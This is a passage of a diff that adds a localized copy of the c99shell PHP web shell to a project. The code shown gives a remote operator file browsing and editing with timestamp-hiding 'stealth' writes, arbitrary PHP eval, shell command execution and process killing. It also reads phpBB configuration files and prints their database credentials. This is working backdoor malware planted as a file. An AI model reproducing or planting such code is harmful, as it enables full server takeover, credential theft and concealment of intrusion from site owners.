+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Ad&#305;</b>";
+   $row[] = "<b>hecmi</b>";
+   $row[] = "<b>D&#601;yi&#351;dirme Tarihi</b>";
+   if (!$win)
+  {$row[] = "<b>Grup</b>";}
+   $row[] = "<b>icaz&#601;l&#601;r</b>";
+   $row[] = "<b>Aktif</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[M&#601;lumat]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[D&#601;yi&#351;dir]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Y&uuml;kl&#601;]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#330000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Hamisini Sec\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Secilenleri Burax\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Yapistir\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">Islet:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Sil</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">icaz&#601;l&#601;ri Duzenle</option>";
+    echo "<option value=cut".($dspact == "cut"?" selected":"").">Kes!</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Kopyala!</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Kes!</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Kopyala!</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Ok!\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Islemci M&#601;lumatleri:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>php Kod Calistir</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Tamam\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = ";";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ 
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</font>
+</td></tr></table><a bookmark="minipanel"><font face="Tahoma"><br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd">
+	<font face="Tahoma"><br/><b>&#399;mr &#304;&#351;l&#601;t:</b> </font> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="&#304;&#351;l&#601;t!"><font face='Tahoma' size='1'><a bookmark="minipanel"><center>
+  <center><font face="Tahoma"><br/><b>Versiya Melumatlarini Axtar</b> </font>
+	<input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en>
+	<p>
+	<input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=25><font face="Tahoma">&nbsp;&nbsp;
+</font>
+<input type=submit value="Axtar" name=btnG></p>
+</center>
+    	</form></td></tr></TABLE>
+						<font face="Tahoma">
+<br>
+					</font>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong><font face="Tahoma">Qorunman&#305; Ke&ccedil;</font></strong><font face="Tahoma"><strong>, 
